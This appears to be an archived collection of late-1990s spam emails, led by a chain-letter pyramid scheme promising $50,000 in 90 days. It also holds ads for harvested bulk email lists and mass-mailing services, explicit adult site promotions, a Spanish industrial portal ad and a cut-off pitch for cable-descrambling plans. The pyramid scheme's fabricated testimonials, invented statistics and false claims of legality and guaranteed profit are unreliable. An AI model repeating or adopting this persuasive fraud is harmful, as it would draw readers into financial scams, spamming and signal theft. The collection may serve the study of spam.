fingers. Fortunately, sometime later I re-read everything and gave
some thought and study to it.
My name is Christopher Erickson. Two years ago, the corporation I
worked at for the past twelve years down-sized and my position was
eliminated. After unproductive job interviews, I decided to open my
own business. Over the past year, I incurred many unforeseen
financial problems. I owed my family, friends, and creditors over
$35,000. The economy was taking a toll on my business and I just
couldn't seem to make ends meet. I had to refinance and borrow
against my home to support my family and struggling business. I truly
believe it was wrong for me to be in debt like this. AT THAT MOMENT
something significant happened in my life and I am writing to share my
experience in hopes that this will change your life
FOREVER....FINANCIALLY!!!
In mid-December, I received this program via email. Six months prior
to receiving this program I had been sending away for information on
various business opportunities. All of the programs I received, in my
opinion, were not cost effective. They were either too difficult for
me to comprehend or the initial investment was too much for me to risk
to see if they worked or not. One claimed I'd make a million dollars
in one year...it didn't tell me I'd have to write a book to make it.
But like I was saying, in December of '92 I received this program. I
didn't send for it, or ask for it, they just got my name off a mailing
list. THANK GOODNESS FOR THAT!!! After reading it several times, to make sure I was
reading it correctly, I couldn't believe my eyes.
Here was a MONEY-MAKING PHENOMENON. I could invest as much as I wanted to start, without
putting me further in debt. After I got a
pencil and paper and figured it out, I would at least get my money
back. After determining that the program is LEGAL and NOT A CHAIN
LETTER, I decided "WHY NOT".

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (1 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
Initially I sent out 10,000 emails. It only cost me about $15.00 for
my time on-line. The great thing about email is that I didn't need
any money for printing to send out the program, only the cost to
fulfill my orders. I am telling you like it is, I hope it doesn't
turn you off, but I promised myself that I would not "rip-off" anyone,
no matter how much money it cost me!.
In less than one week, I was starting to receive orders for REPORT #1.
By January 13th, I had received 26 orders for REPORT #1. When you
read the GUARANTEE in the program, you will see that "YOU MUST RECEIVE 20 ORDERS FOR
REPORT #1 WITHIN TWO WEEKS. IF YOU DON'T, SEND OUT MORE PROGRAMS UNTIL YOU DO!" My
first step in making $50,000 in 90 days was done. By January 30th, I had received 196
orders for REPORT #2. If you go back to the GUARANTEE, "YOU MUST RECEIVE 100
OR MORE ORDERS FOR REPORT #2 WITHIN TWO WEEKS. IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU
DO. ONCE YOU HAVE 100 ORDERS, THE REST IS EASY, RELAX, YOU WILL MAKE YOUR $50,000 GOAL."
Well, I had 196 orders for REPORT #2, 96 more than I needed. So I sat back and relaxed.
By March 19th, of my emailing of 10,000 packets, I received $58,000 with more coming in
every day.
I paid off ALL my debts and bought a much needed new car. Please
take time to read the attached program, IT WILL CHANGE YOUR LIFE
FOREVER! Remember, it wont work if you don't try it. This program
does work, but you must follow it EXACTLY! Especially the rules of
not trying to place your name in a different place. It doesn't work,
you'll lose out on a lot of money! REPORT #2 explains this.
Always follow the guarantee, 20 orders for REPORT #1, and 100
or more orders for REPORT #2 and you will make $50,000 or more in about 90 days.
LIVING PROOF THAT IT WORKS !!!
If you choose not to participate in this program, I'm sorry. It
really is a great opportunity with little cost or risk to you. If you
choose to participate, follow the program and you will be on your way
to financial security.
If you are a fellow business owner and you are in financial trouble
like I was, or you want to start your own business, consider this a
sign. I DID!
Sincerely,
Christopher Erickson
PS Do you have any idea what 11,700 $5 bills ($58,000) look like
piled up on a kitchen table? IT'S AWESOME!
"THREW IT AWAY"
"I had received this program before. I threw it away, but later
wondered if I shouldn't have given it a try. Of course, I had no idea
who to contact to get a copy, so I had to wait until I was emailed
another copy of the program. Eleven months passed, then it came. I
DIDN'T throw this one away. I made $41,000 on the first try."
Dawn W., Evansville, IN
"NO FREE LUNCH"
"My late father always told me, 'remember, Alan, there is no free
lunch in life. You get out of life what you put into it.' Through
trial and error and a somewhat slow frustrating start, I finally
figured it out. The program works very well, I just had to find the
right target group of people to email it to. So far this year, I have
made over $63,000 using this program. I know my dad would have been
very proud of me."
Alan B., Philadelphia, PA
A PERSONAL NOTE FROM THE ORIGINATOR OF THIS PROGRAM
By the time you have read the enclosed information and looked over the
enclosed program and reports, you should have concluded that such a
program, and one that is legal, could not have been created by an
amateur.
Let me tell you a little about myself. I had a profitable business
for ten years. Then in 1979 my business began falling off. I was
doing the same things that were previously successful for me, but it
wasn't working. Finally, I figured it out. It wasn't me, it was the
economy. Inflation and recession had replaced the stable economy that
had been with us since 1945. I don't have to tell you what happened
to the unemployment rate...because many of you know from first hand
experience. There were more failures and bankruptcies than ever
before.

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (2 of 15) [25/10/2000 02:33:07 p.m.]

I AM

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
The middle class was vanishing. Those who knew what they were doing invested wisely and
moved up. Those who did not, including those who never had anything to save or invest,
were moving down into the ranks of the poor. As the saying goes, "THE RICH GET RICHER
AND THE POOR GET POORER." The traditional methods of making money will never allow you
to "move up" or "get rich", inflation will see to that.
You have just received information that can give you financial freedom
for the rest of your life, with "NO RISK" and "JUST A LITTLE BIT OF
EFFORT." You can make more money in the next few months than you have ever imagined.
I should also point out that I will not see a penny of your money, nor
anyone else who has provided a testimonial for this program. I have
already made over FOUR MILLION DOLLARS! I have retired from the
program after sending out over 16,000 programs. Now I have several
offices which market this and several other programs here in the US
and overseas. By the Spring, we wish to market the 'Internet' by a
partnership with AMERICA ON LINE.
Follow the program EXACTLY AS INSTRUCTED. Do not change it in any way. It works
exceedingly well as it is now. Remember to email a copy of this exciting program to
everyone that you can think of. One of
the people you send this to may send out 50,000...and your name will
be on every one of them!. Remember though, the more you send out, the more potential
customers you will reach.
So my friend, I have given you the ideas, information, materials and
opportunity to become financially independent, IT IS UP TO YOU NOW!
"THINK ABOUT IT"
Before you delete this program from your mailbox, as I almost did,
take a little time to read it and REALLY THINK ABOUT IT. Get a pencil
and figure out what could happen when YOU participate. Figure out the
worst possible response and no matter how you calculate it, you will
still make a lot of money! Definitely get back what you invested.
Any doubts you have will vanish when your first orders come in. IT
WORKS!
Paul Johnson, Raleigh, NC
HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU $$$$$$
Let's say that you decide to start small, just to see how it goes, and
we'll assume you and all those involved send out 20,000 programs each.
Let's also assume that the mailing receives a .5% response. Using a
good list the response could be much better. Also many people will
send out hundreds of thousands of programs instead of 20,000. But
continuing with this example, you send out only 20,000 programs. With
a .5% response, that is only 10 orders for REPORT #1. Those 10 people
respond by sending out 20,000 programs each for a total of 200,000. Out
of those .5%, 100 people respond and order REPORT #2. Those 100 mail
out 20,000 programs each for a total of 2000,000. The .5% response to
that is 1,000 orders for REPORT #3. Those 1,000 send out 20,000
programs each for a 2,000,000 total. The .5% response to that is
10,000 orders for REPORT #4. That's 10,000 five dollar bills for you.
CASH!!!! Your total income in this example is $50 + $500 + $5000 +
$50,000 for a total of $55,550!!!!
REMEMBER FRIEND, THIS IS ASSUMING 1,990 OUT OF 2,000 PEOPLE YOU MAIL TO WILL DO
ABSOLUTELY NOTHING... AND TRASH THIS PROGRAM! DARE TO THINK FOR A MOMENT WHAT WOULD
HAPPEN IF EVERYONE OR HALF SENT OUT
100,000 PROGRAMS INSTEAD OF ONLY 2,000. Believe me, many people will do that and more!
By the way, your cost to participate in this is practically nothing. You obviously
already have an internet
connection and email is FREE!!! REPORT#3 will show you the best
methods for bulk emailing and purchasing email lists.
THIS IS A LEGITIMATE,NOW VERY LEGAL, MONEY MAKING OPPORTUNITY. It does not require you
to come in contact with people, do any hard work, and best
of all, you never have to leave the house except to get the mail. If
you believe that someday you'll get that big break that you've been
waiting for, THIS IS IT! Simply follow the instructions, and your
dream will come true. This multi-level email order marketing program
works perfectly...100% EVERY TIME. Email is the sales tool of the
future. Take advantage of this non-commercialized method of
advertising NOW!! The longer you wait, the more people will be doing
business using email. Get your piece of this action!!
MULTI-LEVEL MARKETING (MLM) has finally gained respectability. It is being taught in the
Harvard Business School, and both Stanford
Research and The Wall Street Journal have stated that between 50% and 65% of all goods
and services will be sold throughout Multi-level

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (3 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
Methods by the mid to late 1990's. This is a Multi-Billion Dollar
industry and of the 500,000 millionaires in the US, 20% (100,000) made
their fortune in the last several years in MLM. Moreover, statistics
show 45 people become millionaires everyday through Multi-Level
Marketing.
INSTRUCTIONS
We at Erris Mail Order Marketing Business, have a method of raising
capital that REALLY WORKS 100% EVERY TIME. I am sure that you could use $50,000 to
$125,000 in the next 90 days. Before you say
"Bull", please read the program carefully.
This is not a chain letter, but a NOW perfectly legal money making
opportunity. Basically, this is what we do: As with all multi-level
business, we build our business by recruiting new partners and selling
our products. Every state in the USA allows you to recruit new multilevel business partners, and we offer a product for EVERY dollar sent.
YOUR ORDERS COME AND ARE FILLED THROUGH THE MAIL, so you are not involved in personal
selling. You do it privately in your own home, store or office.
This is the GREATEST Multi-level Mail Order Marketing anywhere:
Step (1)

Order all four 4 REPORTS listed by NAME AND NUMBER. Do this


by ordering the REPORT from each of the four 4 names listed
on the next page. For each REPORT, send $5 CASH and a
SELF- ADDRESSED, STAMPED envelope (BUSINESS SIZE #10)
to the person listed for the SPECIFIC REPORT. International
orders should also include $2 extra for postage. It is
essential that you specify the NAME and NUMBER of the
report requested to the person you are ordering from. You
will need ALL FOUR 4 REPORTS because you will be REPRINTING
and RESELLING them. DO NOT alter the names or sequence
other than what the instructions say. IMPORTANT: Always
provide same-day service on all orders.

Step (2)

Replace the name and address under REPORT #1 with


yours, moving the one that was there down to REPORT #2.
Drop the name and address under REPORT #2 to REPORT #3,
moving the one that was there to REPORT #4. The name and
address that was under REPORT #4 is dropped from the list
and this party is no doubt on the way to the bank. When
doing
this,
make
certain
you type the names and
addresses ACCURATELY! DO NOT MIX UP MOVING PRODUCT/REPORT
POSITIONS!!!

Step (3)

Having made the required changes in the NAME list, save it


as a text (.txt) file in it's own directory to be used with
whatever email program you like. Again, REPORT #3 will
tell you the best methods of bulk emailing and acquiring
email lists.

Step (4)

Email a copy of the entire program (all of this is very


important) to everyone whose address you can get your hands
on. Start with friends and relatives since you can
encourage them to take advantage of this fabulous
money-making opportunity. That's what I did. And they
love me now, more than ever. Then, email to anyone and
everyone! Use your imagination! You can get email
addresses from companies on the internet who specialize in
email mailing lists. These are very cheap, 100,000
addresses for around $35.00.

IMPORTANT: You won't get a good response if you use an old list, so
always request a FRESH, NEW list. You will find out where to purchase
these lists when you order the four 4 REPORTS.
ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!!!
REQUIRED REPORTS
***Order each REPORT by NUMBER and NAME***
ALWAYS SEND A SELF-ADDRESSED, STAMPED ENVELOPE
AND $5 USD CASH FOR EACH ORDER REQUESTING THE
SPECIFIC REPORT BY NAME AND NUMBER
(International orders should also include $2 USD extra for postage)
Add your e amil address when sending in for your report this is for
updated information and continueing support (optional) that will
be handed down by your sponcers pipeline.
______________________________________________________

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (4 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
REPORT #1
"HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES"
ORDER REPORT #1 FROM:
A. Siegmund #57
Trakehnenstr. 13
53332 Bornheim, Germany
______________________________________________________
REPORT #2
"MAJOR CORPORATIONS AND MULTI-LEVEL SALES"
ORDER REPORT#2 FROM:
J. Maz
15774 S. Lagrange Rd
Suite #312
Orland Pk, IL 60462
USA
________________________________________________________
REPORT#3
"SOURCES FOR THE BEST MAILING LISTS"
ORDER REPORT #3 FROM:
B. Thompson
13504 Greencaslte ridge Tr. 404
Burtonsville MD. 20866
USA
______________________________________________________
REPORT #4
"EVALUATING MULTI-LEVEL SALES PLANS"
ORDER REPORT #4 FROM:
MUW #2
PO BOX 71442
SALT LAKE CITY, UT 84171-0442
USA
______________________________________________________
CONCLUSION
One of your free web sites can be registered at http://www.freeyellow.com/
.I am enjoying my fortune that I made by sending out this program.
You too, will be making money in 20 to 90 days, if you follow the
SIMPLE STEPS outlined in this mailing.
To be financially independent is to be FREE. Free to make financial
decisions as never before. Go into business, get into investments,
retire or take a vacation.

----------------------- Headers -------------------------------Return-Path: <ziaza99@sh.hit.no>


Received: from relay01.mail.aol.com (relay01.mail.aol.com [170.31.108.127]) by
air21.mail.aol.com (v37.0) with SMTP; Mon, 22 Dec 1997 12:34:39 -0500
Received: from bonaly.hw.ac.uk (bonaly.hw.ac.uk [130.195.251.5])
by relay01.mail.aol.com (8.8./8.8./AOL-4.5.0)
with SMTP id MAA19336;
Mon, 22 Dec 1997 12:29:50 -0500 (EST)
Date: Mon, 22 Dec 1997 12:29:50 -0500 (EST)
From: ziaza99@sh.hit.no
Received: from 007 (sdn-ts-047mdrelRP11.dialsprint.net) by bonaly.hw.ac.uk (MX
V4.2 AXP) with SMTP; Mon, 22 Dec 1997 17:29:48 +0000 (GMT)
To: ziaza99@sh.hit.no
Comments: Authenticated sender is <ziaza99@sh.hit.no>
Subject:freeFREE web site NOW
Message-ID: <19971221246ZAA24605@theman.hw.ac.uk>
*****************************************************************************************
There is brilliant information available to you,
that will enable you to fully understand yourself
and everybody else. This knowledge can benefit
you tremendously in many ways.
It can help you to get the very best out of your
career, or discover your most suitable new career,
and of course being happy at work, really
improves the finances.

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (5 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
It can also really enhance your love life. If you're
in a relationship, it works great, because you are
able to fully understand your own and your partner's
emotions and motivations. If you're not, you will know
exactly what you want from your perfect mate and what
they will find attractive about you.
Another big advantage to becoming balanced and happy
is that good health runs hand in hand.
Take a closer look two free pages of information at:
http://www.po9.com

************************************************************************************************
**** THE MOST POWERFUL FORM OF ADVERTISING TODAY ****
***** CAN BE YOURS *****
"Sales, it's a numbers game"
The more people that are exposed to your product, the more sales
you will make. Have you ever gotten catalogs in the mail? Maybe you
have never bought from them, but they keep sending them each and
every month!
Why would they do this?
Because it's PROFITABLE! A certain percentage of people buy from
them each and every month. They know this, but they just don't know
who those people are. Thus, they mail everyone on their lists.
Did you know that there is a method of marketing that costs pennies
but have the same effect as direct postal mail?
You can now compete with the big boys, with exposure in MASSIVE
NUMBERS, without expensive investments such as those associated with
television commercials, radio advertising, direct postal mail, or
tele-marketing.
THE SOLUTION - Direct E-mail Marketing
We have developed and maintained a list of Active E-MAIL ADDRESSES in
MILLIONS covering the internet. We gather the addresses from "hits" at
certain targeted web sites, the internet and numerous reliable sources.
The list is a compilation of general and targeted email addresses all
sorted, categorized and combined by domain in sequential batches.
The list is updated bi-weekly.
"Quality before Quantity"
WARNING:
There are vendors marketing 25, 40, 57, and 60 million lists.
These are the worst addresses to purchase. Most of those email
addresses are random generated based on common email formats using
random email generator softwares. This means they are made up and
not harvested. This also means that they have a LOWER percentage
of deliverability.
Some vendors sell these lists for as low as $25. Just remember,
you'll get what you paid for from these amateur vendors. Its nice to
have a big list but if they're all junk ...... they're useless.
AGAIN ......."Quality before Quantity"
We have researched the market completely. Our research indicates that
OTHER companies marketing lists always lacked support and complete
documentation. What good is any product if there is no support or
instructions accompanied.
We provide you with FULL TECH SUPPORT, basic SOFTWARE needed,
COMPLETE INSTRUCTIONS, optional TOOLS and SOFTWARE to
MAXIMIZE your respone while EFFICIENTLY completing the task.
Using our software wizards, getting started is as easy as 1-2-3.
Whether you're novice or advanced. All this available in....

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (6 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
CD-ROM

OVERNIGHT or 2nd Day Delivery !!

Our master list is composed of 15 MILLION ADDRESSES. As we continue


to perform our updates, removing undeliverable addresses and other
non qualified addresses, we have accumulated.....
11 million HIGH QUALITY LISTS
These can be purchased partially or in whole. List tracking numbers
are "internally built" on the list softwares, which enables list
tracking for frequent and future purchases.
TARGETED LISTS AVAILABLE !!
If your product or service is highly targeted to a specific market
such as nationality, gender, age, hobby, occupation or anything,
we can provide your company targeted lists. We use our very own
advanced softwares to search for targeted and deliverable email
addresses.
FREE SOFTWARE BONUSES
POP3 / SMTP manager
List managers
Bulk Email Manual
De/Compressor
Server Simulator
Auto-Pinger
Internet Guide
Web Page Creator
Floodgate
Goldrush LE

- FULL VERSION
- FULL VERSION
- FULL VERSION
- FULL VERSION
- FULL VERSION
- FULL VERSION
- FULL VERSION
- FULL VERSION
- DEMO VERSION
- DEMO VERSION

** 30 day telephone support included **


GENERAL EMAIL LIST PRICING (CD-ROM)
2
4
7
9
11

million
million
million
million
million

$99.95
$119.95
$139.95
$149.95
$159.95

TARGETED EMAIL LIST PRICING


QTY: below 4000
=== $40 per 1000
QTY: 4000 & above === $35 per 1000
SYSTEM REQUIREMENTS
Win3.x or Win95, 486+ CPU, 8mb RAM (win3.x),
16mb RAM (win95), 20+mb HD space
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
TO ORDER --->> print order form below and fax or mail it
Independent Distributor: Steve K.
Ref ID # 1434A236
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
SAME DAY CLEARING !!
CREDIT CARDS
CHECKS by MAIL
MONEY ORDER
FAX: 626-913-6113 (24 hrs)
TEL: 626-912-0115 10a-5p US Pacific Time
^~^~^~^~^~^~^~^~^~^~

O R D E R

Cust# (leave blank):_______________

Monday - Friday

F O R M

~^~^~^~^~^~^~^~^~^~^

Ref ID # 1434A236

Name (User):________________________________________________
Company:_________________________________Position:__________
Phone #:_______________________Fax #:_______________________
Email (MUST):_______________________________________________

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (7 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
** Confirmation and shipping information sent via e-mail
CREDIT CARDS : Address must match the card's billing address
CHECKS : Include street mailing address to be processed
Address:____________________________________________________
____________________________________________________________
** CD-ROM only
__ Win 95
__
__
__
__
__

Email
Email
Email
Email
Email

** Targeted lists -> contact us

__Win 3.x
list
list
list
list
list

(2 million = $99.95)
(4 million = $119.95)
(7 million = $139.95)
(9 million = $149.95)
(11 million = $159.95)

$___________ SUB - TOTAL


$___________ CA residents sales tax (8.25%)
$___________ Shipping & Handling
** Overnight Shipping : ( US=$17 / Canada,AL,HI=$27 )
** 2nd Day Shipping : ( US=FREE / Canada,AL,HI=$18 )
** Other countries : add $35 Reg Postal Mail
$___________ GRAND TOTAL
Client (also known as User or user) understand and agree to the terms
and conditions of this agreement as follows : There are no written,
expressed or implied guarantee or prediction of any type of profit,
gain or results from the purchase or use of Email list (also known as
products). All products sales are final, non-exchangeable and there are
no refund. User assumes all risks and liabilites regarding the use of,
misuse of, inability to use or results of the use of products. There
are no warranties written, expressed or implied. User authorize a charge
to the credit card provided, if applicable as indicated herein. User
warrants the he or she is at least or above 18 years of age and is of
legal age in the state or country of residency. I, the User, have read,
understand and agree to the covenants and conditions contained herein.
Print Name:___________________________________________________
User Signature: ________________________________ Date: __________
Credit Card:

__Visa

__Mastercard

__American Express

__Discover

Card Number:______________________________________Exp:_______
Name on Card:__________________________________Amount:_______
Signature:______________________________________Date:__________
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
All figures, percentages and response rates are for example
purposes only. The actual figures, percentages and response
rates may vary. The individual or group may earn less or more
than the examples provided in this advertisement.
We are an independent and private company. We are NOT directly or
indirectly associated, endorsed or affiliated with any internet
service provider(s) or commercial online service provider(s)
contained within this message, its headers, sub-headers and any
portion whatsoever.

************************************************************************************************
--acentos omitidos-Muy Sr. Nuestro:
Primero quisieramos pedirle disculpas por entrar de esta forma en su oficina.
Nos ponemos en contacto con usted para presentarle Puntolog,
http://www.puntolog.com

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (8 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
punto de encuentro para el sector de la logistica industrial ( manutencion, almacenaje,
manipulacion, robotica, automatica, ... ).
Puntolog tiene como fin servir de nexo entre las diferentes areas de este sector. A
traves de sus secciones podemos permanecer al dia de las novedades existentes en el
mercado, tanto de nuestro pais como del exterior, ver que instalaciones se han hecho
recientemente, consultar dudas a otros profesionales, informarnos de las ferias,
convenciones que van a tener lugar en todo el mundo, y dialogar, a traves del foro, con
otros colegas del sector sobre temas de actualidad.
Le invitamos a navegar por nuestras paginas y de esta forma conocer las diferentes
secciones que en ellas se encuentran. Con nosotros tienen la oportunidad de dar a conocer
sus productos, novedades y servicios a la vez que se relacionan desde su oficina,
de una forma interactiva, con un gran numero de empresas y profesionales.
Gracias por habernos dedicado estos minutos. Esperamos tenerle pronto navegando con
nosotros y utilizando nuestros servicios y espacios.
Atentamente.
Puntolog - Punto de Encuentro del Desarrollo Industrial
http://www.puntolog.com
administracion@puntolog.com

************************************************************************************************
Your Connection to Hot Sexy XXX Live Girls & Adult SEX!
*LIVE GIRL SEX SHOWS!!!
* 10 FREE Live Video Feeds & Chatrooms!!!
*FREE Erotic Stories!!
*1,000's of Free Pictures of XXX Porn Stars!!
*Confessions!!!
*Plus Free Pictures of Teens & Men!!!
*Live Erotic Chat!!!
*Gambling
* Tons of free stuff!!!
So Much More we can't fit it on this page!
See for yourself, Go check it out!!!
You must be 21 or older.
http://207.36.81.148
<A HREF="http://207.36.81.148">AOL CLICK HERE</A>
If you take offense to this email & wish to be taken
off our list,simply e-mail us at: steven@hotmail.com
We're sorry for any convience.
This is a one time mailing only.
oC
************************************************************************************************
>>Young Hot Girls New Site
Can you handle 2 young, hot, sexy girls? Cum watch us at:
http://www.livewhorehouse.com
Where you can complete our menage-a-trois.
We really hate it when you don't cum.
Luv
Nadia and Alexa
XOXOXOXOXOXO

======================================
WE HONOR ALL REMOVE REQUESTS!! JUST MAIL YOUR REQUESTS TO:
jackpotx@ix.netcom.com
======================================
************************************************************************************************
>>Young Hot Girls New Sites

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (9 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
I have listed my top three adult sites for your enjoyment!!!
Can you handle 2 young, hot, sexy girls? Cum watch them at:
http://www.pinkteaze.com
http://www.livewhorehouse.com
http://www.thepinkpussyclub.com
Where you can complete their menage-a-trois.
If you have received this letter by error, we apologize for
any inconvience.The above domains have not given their consent to be listed,
nor are they affiliated in any way to this contest promotion I have simply
listed them for your enjoyment. Now, the reason I have contacted you. If you
call this number today 1-888-689-9274, and leave us your email address. We
will include you in a weekly giveaway that we are currently promoting. The
winners are selected randomly, and will receive prizes such as free
memberships to sites, dates with porn stars, your own free adult site and
much more.!!!If you would like to be removed from our list, simply call
1-888-689-9274 and state that you would liked to be removed. You will only
receive this letter once.
************************************************************************************************
START YOUR OWN FULL OR SPARE-TIME WHOLESALING BUSINESS
FROM YOUR HOME....EARN HUNDREDS A DAY WORKING AS YOUR
OWN BOSS!!
Ready to make money right from your own home? Whether you have
only ten spare hours a month, or a whole family that can devote
practically FULL TIME to your business, you can make fast, big profits.
The demand is here NOW! Sales of specialty products keep soaring
every month.
We put you right into the wholesale business----making you a vital
part of a multi-billion industry. Start in your spare time now, without
overhead. Expand to full-time when you are ready!
For More Free Details on how you can start in your own
business send 2 stamps or $1.00 to:
WHOLESALE DISTRIBUTOR
DAVID EATON
PO BOX 192892
LITTLE ROCK AR 72219
--------------------------------------------------------------------------------------Do not hit reply use contact info in letter!
************************************************************************************************
X-Info:
X-Info:Sent using Zen Bulk Emailer (FREE)
X-Info:See End Of Email For Free Copy And Download Address
Waiting on a Business Opportunity
THAT YOU COULD AFFORD
ONLY $25.00
Convenient Service at Substantial
Discounts
Internet Commerce

Electricity

Paging

THE

Internet Access
& Services
HOME

Cellular
Long Distance

Digital Satellite TV
Imagine Supplying Almost every service a household needs to customers with substantial
discount and receive a recurring monthly commissions on the usage of all the services
Visit website http://www.mirage-net.com/bp/1133791

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (10 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
*** Get The Zen Bulk Emailer FREE - Where To Get it ***
*** FAX/CALL +1 212 2082904 (US) or FAX +44 (01772) 492507 (UK) ***
*** No Question, No Hard Sell, It's Freeware ! ***
************************************************************************************************
****

MASS EXPOSURE

****

DO YOU HAVE A PRODUCT OR SERVICE ?


IS YOUR POTENTIAL MARKET BEING REACHED OR LIMITED BY:
* Geographic location
* Lack of prospects
* Lack of exposure
DO YOU BELIEVE YOU HAVE A VIABLE PRODUCT OR SERVICE ?
"Sales, it's a numbers game"
Did you know that there is a method of marketing that costs pennies
but have the same effect as direct postal mail?
You can now compete with the big boys, with exposure in MASSIVE
NUMBERS, without expensive investments such as those associated with
television commercials, radio advertising, direct postal mail, or
tele-marketing.
THE SOLUTION - Direct E-mail Marketing
Direct E-mail marketing is a proven and profitable method with a
global market, incurring the smallest investment. It is more
advantageous than conventional marketing and the risk is minimal.
The prospects are millions world wide and can be reached for much
less than conventional methods.
WE CAN SEND YOUR ADVERTISEMENT......
TO HUNDREDS of THOUSANDS !!!!
Targeted Mailings Availble !!
If your product or service is highly targeted to a specific market
such as nationality, gender, age, hobby, occupation or anything,
we can provide your company targeted email service or you can purchase
such lists. We use our very own advanced softwares to search for
targeted and deliverable email addresses.
How do I know my Ad was sent ?

Good question !

1) When your advertisement is sent, the assigned lists are automatically


seeded with the email address you provided us. The seed is placed every
couple of thousands (depending on the quantity purchased) within the
assigned list. Therefore, every couple of thousand you will receive
several copies of the ad that went out.
2) In any MASS advertising such as television, direct postal mail,
radio advertisng, telemarketing or even direct email (bulk email),
there is always a response rate. It is a question of quantity.
When an advertisement is sent in MASS quantity as with direct email,
there is a response rate. However, this response rate in percent
will vary from ad to ad. The response depends directly on the
advertisment's "subject", letter content, and many other factors.
The bottom line is that an ad mailed out will create some type of
response rate.....high....low.....moderate....etc.
PRICING AND SERVICES LISTED BELOW
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
TO ORDER --->> print order form below and fax or mail it
Independent Distributor: James M.
Ref ID # 142JM5487
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
SAME DAY CLEARING !!
CREDIT CARDS
CHECKS by MAIL
MONEY ORDER

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (11 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
FAX: 626-913-0478
TEL: 626-839-3755
HRS: 10am - 5pm

US Pacific Time

^~^~^~^~^~^~^~^~^~^~

Monday - Friday

O R D E R

Cust# (leave blank):_______________

F O R M

~^~^~^~^~^~^~^~^~^~^

Ref ID # 142JM5487

Name (Subscriber):__________________________________________
Company:_________________________________Position:__________
Phone #:_______________________Fax #:_______________________
Email (MUST):_______________________________________________
**
**
**
**
**

Confirmation sent via e-mail.


Send your ad with this order or at a later time.
Your ad will be formatted to ASCII text.
Ads are scheduled on a first come first served basis.
Average schedule is three days from receipt of order.

CREDIT CARDS : Address must match the card's billing address


CHECKS : Include street mailing address to be processed
Address:____________________________________________________
___ Ad Services: 60 line Ad to 250,000 ($225)
___ Ad Services: 60 line Ad to 500,000 ($349)
___ Ad Services: 60 line Ad to 1,000,000 ($599)
** Targeted Ads QTY: below 4000
=== $50 per 1000
** Targeted Ads QTY: 4000 & above === $35 per 1000
___ Ad Services: TARGETED 60 line Ad (QTY _____________)
** Targeted Keywords: ______________________________
$___________ SUB - TOTAL
$___________ GRAND TOTAL
Client (also known as Subscriber or subscriber) understand and agree
to the following terms and conditions of this agreement. There are no
written, expressed or implied guarantee or prediction of any type of
profit, gain or results from these Ad Services (also known as services).
All Ad Services sales are final and there are no refund or exchanges.
Payment in full is due in advance of service. If subscriber is not
satisfied with Ad Services for any reason, within thirty days, service
will be performed once more, without fees. Subscriber assumes all risks
and liabilites for any claims subscriber may represent in any
advertisement and relieves all parties, individuals or groups involved
in the performance of service from all responsibilities and liabilities
arising from the these services. Subscriber authorize a charge to the
credit card provided, if applicable as indicated herein. I, the subscriber,
have read, understand and agree to the terms and conditions contained
herein.
Subscriber Name:_____________________________________________
Subscriber Signature: ___________________________Date: __________
Credit Card:

__Visa

__Mastercard

__American Express

__Discover

Card Number:______________________________________Exp:_______
Name on Card:__________________________________Amount:_______
Signature:______________________________________Date:__________
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
All figures, percentages and response rates are for example
purposes only. The actual figures, percentages and response
rates may vary. The individual or group may earn less or more
than the examples provided in thi

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (12 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
************************************************************************************************
This is really cool!
PREMIUM CHANNELS and PAY PER VIEW EVENTS
**** FREE ****
**

Well Tested

Throughout Europe ! **

EASY to assemble plans for only $6.99 USD !


We will send your plans the day we receive your order!
YOU WILL BE WATCHING HBO, SHOWTIME,
